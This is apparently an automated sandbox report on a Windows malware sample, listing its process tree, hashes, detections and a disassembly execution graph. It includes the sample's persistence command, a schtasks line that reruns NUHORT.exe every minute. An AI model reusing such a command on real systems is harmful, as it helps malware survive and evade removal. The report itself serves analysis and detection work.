                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:5
                                                                                                                                Start time:12:20:01
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:6
                                                                                                                                Start time:12:20:02
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs
                                                                                                                                Imagebase:0xfa0000
                                                                                                                                File size:147'456 bytes
                                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.4540189896.0000000003430000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.4538842367.0000000003158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:12:20:02
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                                                                                                                Imagebase:0xcd0000
                                                                                                                                File size:187'904 bytes
                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:12:20:04
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:12:20:13
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:14
                                                                                                                                Start time:12:20:21
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:771'584 bytes
                                                                                                                                MD5 hash:B30E717CDE0FA4A5DE907A7148308430
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:15
                                                                                                                                Start time:12:20:29
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:16
                                                                                                                                Start time:12:20:37
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:17
                                                                                                                                Start time:12:21:01
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:21
                                                                                                                                Start time:12:21:52
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 23736
                                                                                                                                Imagebase:0x30000
                                                                                                                                File size:483'680 bytes
                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:22
                                                                                                                                Start time:12:22:00
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:23
                                                                                                                                Start time:12:22:04
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\splwow64.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                Imagebase:0x7ff7511c0000
                                                                                                                                File size:163'840 bytes
                                                                                                                                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:26
                                                                                                                                Start time:12:22:24
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 17084
                                                                                                                                Imagebase:0x30000
                                                                                                                                File size:483'680 bytes
                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:27
                                                                                                                                Start time:12:23:00
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Imagebase:0x70000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:41
                                                                                                                                Start time:12:23:42
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 14008
                                                                                                                                Imagebase:0x30000
                                                                                                                                File size:483'680 bytes
                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:4.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:12%
                                                                                                                                  Total number of Nodes:2000
                                                                                                                                  Total number of Limit Nodes:35
                                                                                                                                  execution_graph 107232 eae8eb 107235 eb2b40 107232->107235 107234 eae8f7 107236 eb2b98 107235->107236 107286 eb2bfc __NMSG_WRITE _memmove 107235->107286 107237 eb2bbf 107236->107237 107238 eb33cb 107236->107238 107239 f17cf3 107236->107239 107310 ec010a 107237->107310 107337 ea5577 417 API calls Mailbox 107238->107337 107242 f17cf8 107239->107242 107249 f17d15 107239->107249 107242->107237 107246 f17d01 107242->107246 107243 eb2be8 107244 ec010a 48 API calls 107243->107244 107244->107286 107245 f17d38 107362 eed520 86 API calls 4 library calls 107245->107362 107360 efd443 417 API calls Mailbox 107246->107360 107249->107245 107361 efd8ff 417 API calls 2 library calls 107249->107361 107250 eb366d 107391 eed520 86 API calls 4 library calls 107250->107391 107253 f18518 107253->107234 107254 f183d1 107379 eed520 86 API calls 4 library calls 107254->107379 107255 f184df 107390 eed520 86 API calls 4 library calls 107255->107390 107259 f183eb 107380 eed520 86 API calls 4 library calls 107259->107380 107260 f17e43 107363 eed520 86 API calls 4 library calls 107260->107363 107262 f18434 107382 eed520 86 API calls 4 library calls 107262->107382 107264 ead3d2 48 API calls 107264->107286 107266 ead2d2 53 API calls 107266->107286 107268 f1844e 107383 eed520 86 API calls 4 library calls 107268->107383 107269 ead349 53 API calls 107269->107286 107270 ec1b2a 52 API calls __cinit 107270->107286 107272 eb345e 107381 eed520 86 API calls 4 library calls 107272->107381 107274 f184b5 107388 eed520 86 API calls 4 library calls 107274->107388 107278 f184c8 107389 eed520 86 API calls 4 library calls 107278->107389 107279 eafa40 417 API calls 107279->107286 107281 eb3637 107384 eed520 86 API calls 4 library calls 107281->107384 107285 f181d7 107376 efd154 48 API calls 107285->107376 107286->107250 107286->107254 107286->107255 107286->107259 107286->107260 107286->107262 107286->107264 107286->107266 107286->107268 107286->107269 107286->107270 107286->107272 107286->107274 107286->107278 107286->107279 107286->107281 107286->107285 107289 f184a4 107286->107289 107292 eac935 48 API calls 107286->107292 107293 f1826c 107286->107293 107295 eacdb4 48 API calls 107286->107295 107296 eb3157 107286->107296 107305 ec010a 48 API calls 107286->107305 107306 eda599 InterlockedDecrement 107286->107306 107319 eaca8e 107286->107319 107333 ead380 107286->107333 107338 ea7e53 107286->107338 107347 ea346e 48 API calls 107286->107347 107348 ea3320 107286->107348 107359 ea203a 417 API calls 107286->107359 107364 ead89e 107286->107364 107374 efd154 48 API calls 107286->107374 107375 eeab1c 50 API calls 107286->107375 107387 eed520 86 API calls 4 library calls 107289->107387 107292->107286 107293->107296 107386 eed520 86 API calls 4 library calls 107293->107386 107294 f181ea 107307 f1822c 107294->107307 107377 efd154 48 API calls 107294->107377 107295->107286 107296->107234 107301 f18259 107303 ea3320 48 API calls 107301->107303 107302 f18236 107302->107281 107302->107301 107304 f18261 107303->107304 107304->107293 107308 f18478 107304->107308 107305->107286 107306->107286 107378 ea346e 48 API calls 107307->107378 107385 eed520 86 API calls 4 library calls 107308->107385 107311 ec0112 __calloc_impl 107310->107311 107313 ec012c 107311->107313 107314 ec012e std::exception::exception 107311->107314 107392 ec45ec 107311->107392 107313->107243 107406 ec7495 RaiseException 107314->107406 107316 ec0158 107407 ec73cb 47 API calls _free 107316->107407 107318 ec016a 107318->107243 107320 eacad0 107319->107320 107321 eaca9a 107319->107321 107322 eacad9 107320->107322 107323 eacae3 107320->107323 107326 ec010a 48 API calls 107321->107326 107324 ea7e53 48 API calls 107322->107324 107418 eac4cd 107323->107418 107330 eacac6 107324->107330 107327 eacaad 107326->107327 107328 f14f11 107327->107328 107329 eacab8 107327->107329 107328->107330 107422 ead3d2 107328->107422 107329->107330 107414 eacaee 107329->107414 107330->107286 107334 ead38b 107333->107334 107335 ead3b4 107334->107335 107427 ead772 55 API calls 107334->107427 107335->107286 107337->107296 107339 ea7ecf 107338->107339 107340 ea7e5f __NMSG_WRITE 107338->107340 107432 eaa2fb 107339->107432 107343 ea7e7b 107340->107343 107344 ea7ec7 107340->107344 107342 ea7e85 _memmove 107342->107286 107428 eaa6f8 107343->107428 107431 ea7eda 48 API calls 107344->107431 107347->107286 107349 ea3334 107348->107349 107351 ea3339 Mailbox 107348->107351 107440 ea342c 48 API calls 107349->107440 107357 ea3347 107351->107357 107441 ea346e 48 API calls 107351->107441 107353 ec010a 48 API calls 107355 ea33d8 107353->107355 107354 ea3422 107354->107286 107356 ec010a 48 API calls 107355->107356 107358 ea33e3 107356->107358 107357->107353 107357->107354 107358->107286 107358->107358 107359->107286 107360->107296 107361->107245 107362->107286 107363->107296 107365 ead8ac 107364->107365 107372 ead8db Mailbox 107364->107372 107366 ead8ff 107365->107366 107368 ead8b2 Mailbox 107365->107368 107442 eac935 107366->107442 107369 ead8c7 107368->107369 107370 f14e9b 107368->107370 107371 f14e72 VariantClear 107369->107371 107369->107372 107370->107372 107446 eda599 InterlockedDecrement 107370->107446 107371->107372 107372->107286 107374->107286 107375->107286 107376->107294 107377->107294 107378->107302 107379->107259 107380->107296 107381->107296 107382->107268 107383->107296 107384->107296 107385->107296 107386->107296 107387->107296 107388->107296 107389->107296 107390->107296 107391->107253 107393 ec4667 __calloc_impl 107392->107393 107399 ec45f8 __calloc_impl 107392->107399 107413 ec889e 47 API calls __getptd_noexit 107393->107413 107396 ec462b RtlAllocateHeap 107396->107399 107405 ec465f 107396->107405 107398 ec4603 107398->107399 107408 ec8e52 47 API calls __NMSG_WRITE 107398->107408 107409 ec8eb2 47 API calls 5 library calls 107398->107409 107410 ec1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 107398->107410 107399->107396 107399->107398 107400 ec4653 107399->107400 107403 ec4651 107399->107403 107411 ec889e 47 API calls __getptd_noexit 107400->107411 107412 ec889e 47 API calls __getptd_noexit 107403->107412 107405->107311 107406->107316 107407->107318 107408->107398 107409->107398 107411->107403 107412->107405 107413->107405 107415 eacafd __NMSG_WRITE _memmove 107414->107415 107416 ec010a 48 API calls 107415->107416 107417 eacb3b 107416->107417 107417->107330 107419 eac4da 107418->107419 107420 eac4e7 107418->107420 107419->107330 107421 ec010a 48 API calls 107420->107421 107421->107419 107423 ec010a 48 API calls 107422->107423 107424 ead3f3 107423->107424 107425 ec010a 48 API calls 107424->107425 107426 ead401 107425->107426 107426->107330 107427->107335 107429 ec010a 48 API calls 107428->107429 107430 eaa702 107429->107430 107430->107342 107431->107342 107433 eaa309 107432->107433 107435 eaa321 _memmove 107432->107435 107433->107435 107436 eab8a7 107433->107436 107435->107342 107437 eab8ba 107436->107437 107439 eab8b7 _memmove 107436->107439 107438 ec010a 48 API calls 107437->107438 107438->107439 107439->107435 107440->107351 107441->107357 107443 eac948 107442->107443 107444 eac940 107442->107444 107443->107372 107447 ead805 107444->107447 107446->107372 107448 ead828 _memmove 107447->107448 107449 ead815 107447->107449 107448->107443 107449->107448 107450 ec010a 48 API calls 107449->107450 107450->107448 107451 eae849 107454 eb26c0 107451->107454 107453 eae852 107455 eb273b 107454->107455 107456 f1862d 107454->107456 107458 eb2adc 107455->107458 107459 eb277c 107455->107459 107468 eb279a 107455->107468 107643 eed520 86 API calls 4 library calls 107456->107643 107642 ead349 53 API calls 107458->107642 107497 eb28f6 107459->107497 107576 ead500 53 API calls __cinit 107459->107576 107460 f1863e 107644 eed520 86 API calls 4 library calls 107460->107644 107461 eb27cf 107461->107460 107464 eb27db 107461->107464 107462 eb2a84 107471 ead380 55 API calls 107462->107471 107466 eb27ef 107464->107466 107480 f1865a 107464->107480 107469 eb2806 107466->107469 107470 f186c9 107466->107470 107468->107461 107468->107462 107491 eb2914 107468->107491 107577 eafa40 107469->107577 107472 f18ac9 107470->107472 107475 eafa40 417 API calls 107470->107475 107474 eb2aab 107471->107474 107695 eed520 86 API calls 4 library calls 107472->107695 107636 ead2d2 107474->107636 107479 f186ee 107475->107479 107483 ead89e 50 API calls 107479->107483 107490 f1870a 107479->107490 107493 eb29ec 107479->107493 107480->107470 107480->107493 107645 eff211 417 API calls 107480->107645 107646 eff4df 417 API calls 107480->107646 107481 f18980 107690 eed520 86 API calls 4 library calls 107481->107690 107482 eb2836 107482->107472 107487 eafa40 417 API calls 107482->107487 107483->107490 107511 eb287c 107487->107511 107488 eac935 48 API calls 107488->107482 107489 eb28cc 107489->107497 107633 eacf97 58 API calls 107489->107633 107496 f1878d 107490->107496 107647 ea346e 48 API calls 107490->107647 107557 eacdb4 107491->107557 107493->107453 107494 eb296e 107494->107493 107501 eb2984 107494->107501 107506 f18a97 107494->107506 107514 f189b4 107494->107514 107495 eb28ac 107495->107489 107688 eacf97 58 API calls 107495->107688 107500 f1882d 107496->107500 107515 f1883f 107496->107515 107664 ee4e71 53 API calls __cinit 107496->107664 107505 eb2900 107497->107505 107689 eacf97 58 API calls 107497->107689 107507 eaca8e 48 API calls 107500->107507 107501->107506 107634 eb41fc 84 API calls 107501->107634 107503 f18888 107508 eb281d 107503->107508 107509 f1888c 107503->107509 107505->107481 107505->107491 107506->107493 107694 ea4b02 50 API calls 107506->107694 107507->107515 107508->107482 107508->107488 107508->107493 107687 eed520 86 API calls 4 library calls 107509->107687 107511->107493 107511->107495 107518 eafa40 417 API calls 107511->107518 107562 efbf80 107514->107562 107686 efc235 417 API calls Mailbox 107515->107686 107517 eb29b8 107519 f18a7e 107517->107519 107635 eb41fc 84 API calls 107517->107635 107525 f188ff 107518->107525 107693 ebee93 84 API calls 107519->107693 107520 f18725 107520->107500 107648 eb14a0 107520->107648 107522 f187ca 107523 f18813 107522->107523 107665 ea84a6 107522->107665 107530 ead89e 50 API calls 107523->107530 107525->107493 107531 ead89e 50 API calls 107525->107531 107527 f189f3 107538 f18a01 107527->107538 107539 f18a42 107527->107539 107529 eb29ca 107529->107493 107534 f18a6f 107529->107534 107535 eb29e5 107529->107535 107532 f18821 107530->107532 107531->107495 107536 ead89e 50 API calls 107532->107536 107692 efd1da 50 API calls 107534->107692 107543 ec010a 48 API calls 107535->107543 107536->107500 107537 f1875d 107537->107500 107546 eb14a0 48 API calls 107537->107546 107540 eaca8e 48 API calls 107538->107540 107541 ead89e 50 API calls 107539->107541 107540->107493 107544 f18a4b 107541->107544 107543->107493 107547 ead89e 50 API calls 107544->107547 107545 f187e0 107545->107523 107685 eea76d 49 API calls 107545->107685 107549 f18775 107546->107549 107550 f18a57 107547->107550 107552 ead89e 50 API calls 107549->107552 107691 ea4b02 50 API calls 107550->107691 107551 f18807 107554 ead89e 50 API calls 107551->107554 107555 f18781 107552->107555 107554->107523 107556 ead89e 50 API calls 107555->107556 107556->107496 107558 eacdc5 107557->107558 107559 eacdca 107557->107559 107558->107559 107696 ec2241 48 API calls 107558->107696 107559->107494 107561 eace07 107561->107494 107567 efbfd9 _memset 107562->107567 107564 efc22e 107564->107527 107565 efc14c 107566 efc19f VariantInit VariantClear 107565->107566 107570 efc033 107565->107570 107568 efc1c5 107566->107568 107567->107565 107569 efc097 VariantInit 107567->107569 107567->107570 107568->107570 107571 efc1e6 107568->107571 107574 efc0d6 107569->107574 107699 efc235 417 API calls Mailbox 107570->107699 107698 eea6f6 103 API calls 107571->107698 107573 efc20d VariantClear 107573->107564 107574->107570 107697 eea6f6 103 API calls 107574->107697 107576->107468 107578 eafa60 107577->107578 107614 eafa8e Mailbox _memmove 107577->107614 107580 ec010a 48 API calls 107578->107580 107579 ec1b2a 52 API calls __cinit 107579->107614 107580->107614 107581 eb105e 107582 eac935 48 API calls 107581->107582 107606 eafbf1 Mailbox 107582->107606 107583 ead3d2 48 API calls 107583->107614 107586 eb0119 108091 eed520 86 API calls 4 library calls 107586->108091 107587 eb1063 108090 eed520 86 API calls 4 library calls 107587->108090 107588 eb0dee 107590 ead89e 50 API calls 107588->107590 107591 eb0dfa 107590->107591 107593 ead89e 50 API calls 107591->107593 107592 f1b772 108092 eed520 86 API calls 4 library calls 107592->108092 107597 eb0e83 107593->107597 107596 eac935 48 API calls 107596->107614 107601 eacaee 48 API calls 107597->107601 107598 eda599 InterlockedDecrement 107598->107614 107600 f1b7d2 107613 eb10f1 Mailbox 107601->107613 107604 eb1230 107604->107606 108089 eed520 86 API calls 4 library calls 107604->108089 107606->107508 107607 ec010a 48 API calls 107607->107614 107608 eafa40 417 API calls 107608->107614 107611 f1b583 108087 eed520 86 API calls 4 library calls 107611->108087 108088 eed520 86 API calls 4 library calls 107613->108088 107614->107579 107614->107581 107614->107583 107614->107586 107614->107587 107614->107588 107614->107591 107614->107592 107614->107596 107614->107597 107614->107598 107614->107604 107614->107606 107614->107607 107614->107608 107614->107611 107614->107613 107700 eaf6d0 107614->107700 107772 ef936f 107614->107772 107800 ebef0d 107614->107800 107843 f0798d 107614->107843 107848 f030ad 107614->107848 107902 f010e5 107614->107902 107908 f0804e 107614->107908 107922 efb74b VariantInit 107614->107922 107963 f01f19 107614->107963 107966 ef92c0 107614->107966 107984 ea50a3 107614->107984 107989 ef8065 GetCursorPos GetForegroundWindow 107614->107989 108003 ebf461 107614->108003 108041 ef9122 107614->108041 108055 f00bfa 107614->108055 108058 ebdd84 107614->108058 108061 ebf03e 107614->108061 108064 ef013f 107614->108064 108077 f017aa 107614->108077 108082 eb1620 59 API calls Mailbox 107614->108082 108083 efee52 82 API calls 2 library calls 107614->108083 108084 efef9d 90 API calls Mailbox 107614->108084 108085 eeb020 48 API calls 107614->108085 108086 efe713 417 API calls Mailbox 107614->108086 107633->107497 107634->107517 107635->107529 107637 ead30a 107636->107637 107638 ead2df 107636->107638 107637->107491 107641 ead2e6 107638->107641 109494 ead349 53 API calls 107638->109494 107641->107637 109493 ead349 53 API calls 107641->109493 107642->107495 107643->107460 107644->107480 107645->107480 107646->107480 107647->107520 107649 eb1606 107648->107649 107651 eb14b2 107648->107651 107649->107537 107650 eb14be 107656 eb14c9 107650->107656 109496 ea346e 48 API calls 107650->109496 107651->107650 107653 ec010a 48 API calls 107651->107653 107654 f15299 107653->107654 107655 ec010a 48 API calls 107654->107655 107663 f152a4 107655->107663 107657 eb156d 107656->107657 107658 ec010a 48 API calls 107656->107658 107657->107537 107659 eb15af 107658->107659 107660 eb15c2 107659->107660 109495 ebd6b4 48 API calls 107659->109495 107660->107537 107662 ec010a 48 API calls 107662->107663 107663->107650 107663->107662 107664->107522 107666 ea84be 107665->107666 107683 ea84ba 107665->107683 107667 f15592 __i64tow 107666->107667 107668 f15494 107666->107668 107669 ea84d2 107666->107669 107677 ea84ea __itow Mailbox _wcscpy 107666->107677 107670 f1557a 107668->107670 107671 f1549d 107668->107671 109497 ec234b 80 API calls 3 library calls 107669->109497 109498 ec234b 80 API calls 3 library calls 107670->109498 107676 f154bc 107671->107676 107671->107677 107674 ec010a 48 API calls 107675 ea84f4 107674->107675 107679 eacaee 48 API calls 107675->107679 107675->107683 107678 ec010a 48 API calls 107676->107678 107677->107674 107681 f154d9 107678->107681 107679->107683 107680 ec010a 48 API calls 107682 f154ff 107680->107682 107681->107680 107682->107683 107684 eacaee 48 API calls 107682->107684 107683->107545 107684->107683 107685->107551 107686->107503 107687->107493 107688->107489 107689->107505 107690->107493 107691->107493 107692->107519 107693->107506 107694->107472 107695->107493 107696->107561 107697->107565 107698->107573 107699->107564 107701 eaf77b 107700->107701 107702 eaf708 107700->107702 107707 f1c253 107701->107707 107755 eaf787 107701->107755 107703 f1c4d5 107702->107703 107704 eaf712 107702->107704 107708 f1c4e2 107703->107708 107709 f1c4f4 107703->107709 107705 eaf71c 107704->107705 107710 f1c544 107704->107710 107715 f1c6a4 107705->107715 107716 eaf741 107705->107716 107723 eaf72a 107705->107723 107706 eafa40 417 API calls 107706->107755 108116 eed520 86 API calls 4 library calls 107707->108116 108093 eff34f 107708->108093 108121 efc235 417 API calls Mailbox 107709->108121 107711 f1c585 107710->107711 107734 f1c569 107710->107734 107724 f1c590 107711->107724 107725 f1c5a4 107711->107725 107720 eac935 48 API calls 107715->107720 107717 eaf770 Mailbox 107716->107717 107731 f1c7b5 107716->107731 108223 efee52 82 API calls 2 library calls 107716->108223 107717->107614 107718 f1c264 107718->107614 107719 f1c507 107719->107716 107722 f1c50b 107719->107722 107720->107716 108122 eed520 86 API calls 4 library calls 107722->108122 107723->107716 108222 eda599 InterlockedDecrement 107723->108222 107727 eff34f 417 API calls 107724->107727 108124 efd154 48 API calls 107725->108124 107727->107716 107729 f1c45a 107733 eac935 48 API calls 107729->107733 107738 f1c7eb 107731->107738 108224 efef9d 90 API calls Mailbox 107731->108224 107732 f1c5af 107745 f1c62c 107732->107745 107758 f1c5d1 107732->107758 107733->107716 108123 eed520 86 API calls 4 library calls 107734->108123 107735 eaf84a 107741 f1c32a 107735->107741 107752 eaf854 107735->107752 107739 ead89e 50 API calls 107738->107739 107739->107717 108117 ea342c 48 API calls 107741->108117 107742 f1c793 107744 ea84a6 81 API calls 107742->107744 107760 f1c79b __NMSG_WRITE 107744->107760 108149 eeafce 48 API calls 107745->108149 107746 f1c7c9 107750 ea84a6 81 API calls 107746->107750 107748 eb14a0 48 API calls 107754 eaf8ab 107748->107754 107749 ec2241 48 API calls 107749->107755 107764 f1c7d1 __NMSG_WRITE 107750->107764 107751 eaf8bb 107751->107716 107751->107718 107751->107729 108118 eda599 InterlockedDecrement 107751->108118 108120 eff4df 417 API calls 107751->108120 107752->107748 107754->107751 107757 eaf9d8 107754->107757 107755->107706 107755->107717 107755->107735 107755->107749 107755->107751 107755->107757 108119 eed520 86 API calls 4 library calls 107757->108119 108125 eea485 48 API calls 107758->108125 107759 f1c63e 108150 ebdf08 48 API calls 107759->108150 107760->107731 107762 ead89e 50 API calls 107760->107762 107762->107731 107764->107738 107765 ead89e 50 API calls 107764->107765 107765->107738 107766 f1c647 Mailbox 108151 eea485 48 API calls 107766->108151 107767 f1c5f6 108126 eb44e0 107767->108126 107770 f1c663 108152 eb3680 107770->108152 107773 eacdb4 48 API calls 107772->107773 107774 ef938a 107773->107774 107775 eacdb4 48 API calls 107774->107775 107776 ef939a 107775->107776 107777 eaca8e 48 API calls 107776->107777 107778 ef93a9 107777->107778 107779 ef93c2 select 107778->107779 107799 ef93ae Mailbox _memmove 107778->107799 107780 ef941f 107779->107780 107781 ef9414 WSAGetLastError 107779->107781 107782 ec010a 48 API calls 107780->107782 107781->107799 107783 ef9428 107782->107783 107784 ea4bce 48 API calls 107783->107784 107785 ef9432 __WSAFDIsSet 107784->107785 107786 ef944a 107785->107786 107785->107799 107787 ef94f5 WSAGetLastError 107786->107787 107788 ef9463 107786->107788 107787->107799 107789 ef947b _strlen 107788->107789 107790 eacdb4 48 API calls 107788->107790 107788->107799 107791 ef94be 107789->107791 107792 ef948e 107789->107792 107790->107789 109049 eead14 48 API calls _memset 107791->109049 109041 ede0f5 48 API calls 2 library calls 107792->109041 107795 ef9497 109042 efae5a 50 API calls 107795->109042 107797 ef94a3 109043 ea7bef 107797->109043 107799->107614 107801 eaca8e 48 API calls 107800->107801 107802 ebef25 107801->107802 107803 ebeffb 107802->107803 